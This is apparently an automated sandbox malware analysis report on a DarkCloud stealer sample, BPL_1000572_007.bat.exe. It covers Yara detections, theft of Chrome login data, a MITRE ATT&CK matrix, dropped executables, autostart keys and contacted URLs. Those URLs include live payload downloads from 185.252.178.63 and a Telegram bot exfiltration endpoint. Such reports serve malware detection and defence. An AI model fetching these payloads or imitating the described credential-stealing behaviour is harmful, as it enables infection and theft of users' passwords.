                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Users\user\Desktop\BPL_1000572_007.bat.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeQueries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeQueries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Generic Dropper
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
                  Yara detected DarkCloud
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                  Remote Access Functionality

                  barindex
                  Yara detected DarkCloud
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts221
                  Windows Management Instrumentation                  		11
                  Registry Run Keys / Startup Folder                  		111
                  Process Injection                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Command and Scripting Interpreter                  		Boot or Logon Initialization Scripts11
                  Registry Run Keys / Startup Folder                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		23
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		Exfiltration Over Bluetooth1
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information                  		Security Account Manager341
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Input Capture                  		Automated Exfiltration2
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets51
                  Virtualization/Sandbox Evasion                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common51
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                  Process Injection                  		DCSync1
                  Remote System Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Network Configuration Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 708242 Sample: BPL_1000572_007.bat.exe Startdate: 23/09/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Yara detected DarkCloud 2->49 51 5 other signatures 2->51 7 BPL_1000572_007.bat.exe 16 8 2->7         started        12 pdf.exe 14 2 2->12         started        14 fireless.exe 2->14         started        16 pdf.exe 2 2->16         started        process3 dnsIp4 43 185.252.178.63, 49707, 49709, 49710 LVLT-10753US Germany 7->43 33 C:\Users\user\AppData\Roaming\note\pdf.exe, PE32 7->33 dropped 35 C:\Users\user\...\Wthdlxoyqvnqsfcfiinf.exe, PE32 7->35 dropped 37 C:\Users\user\...\pdf.exe:Zone.Identifier, ASCII 7->37 dropped 39 C:\Users\user\...\BPL_1000572_007.bat.exe.log, ASCII 7->39 dropped 61 May check the online IP address of the machine 7->61 63 Encrypted powershell cmdline option found 7->63 65 Creates multiple autostart registry keys 7->65 71 3 other signatures 7->71 18 BPL_1000572_007.bat.exe 1 16 7->18         started        23 Wthdlxoyqvnqsfcfiinf.exe 14 2 7->23         started        25 powershell.exe 16 7->25         started        67 Multi AV Scanner detection for dropped file 12->67 69 Machine Learning detection for dropped file 12->69 file5 signatures6 process7 dnsIp8 41 showip.net 162.55.60.2, 49708, 80 ACPCA United States 18->41 31 C:\Users\user\AppData\...\fireless.exe, PE32 18->31 dropped 53 Creates multiple autostart registry keys 18->53 55 Tries to harvest and steal browser information (history, passwords, etc) 18->55 57 Multi AV Scanner detection for dropped file 23->57 59 Machine Learning detection for dropped file 23->59 27 WerFault.exe 7 23->27         started        29 conhost.exe 25->29         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  BPL_1000572_007.bat.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\note\pdf.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                  13.0.BPL_1000572_007.bat.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                  0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/0%Avira URL Cloudsafe
                  http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png0%Avira URL Cloudsafe
                  http://185.252.178.630%Avira URL Cloudsafe
                  http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl0%Avira URL Cloudsafe
                  http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp0%Avira URL Cloudsafe
                  http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  showip.net
                  		162.55.60.2
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://showip.net/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFiBPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabBPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                          		high
                          http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)AcugwsmmzufefycomfxvihlWthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoBPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                            		high
                            https://api.telegram.org/botBPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://showip.net/BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.252.178.63BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://unpkg.com/leafletBPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://search.yahoo.com?fr=crmas_sfpfBPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                      		high
                                      https://www.newtonsoft.com/jsonBPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://upx.sf.netAmcache.hve.21.drfalse
                                          		high
                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchBPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                            		high
                                            https://showip.net/?checkip=BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                                		high
                                                http://james.newtonking.com/projects/jsonfireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.telegram.org/bot4(SpawnProcess)BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ac.ecosia.org/autocomplete?q=LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                                    		high
                                                    https://search.yahoo.com?fr=crmas_sfpBPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                                      		high
                                                      http://schema.orgBPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.openstreetmap.org/copyrightBPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.newtonsoft.com/jsonschemafireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.nuget.org/packages/Newtonsoft.Json.BsonBPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
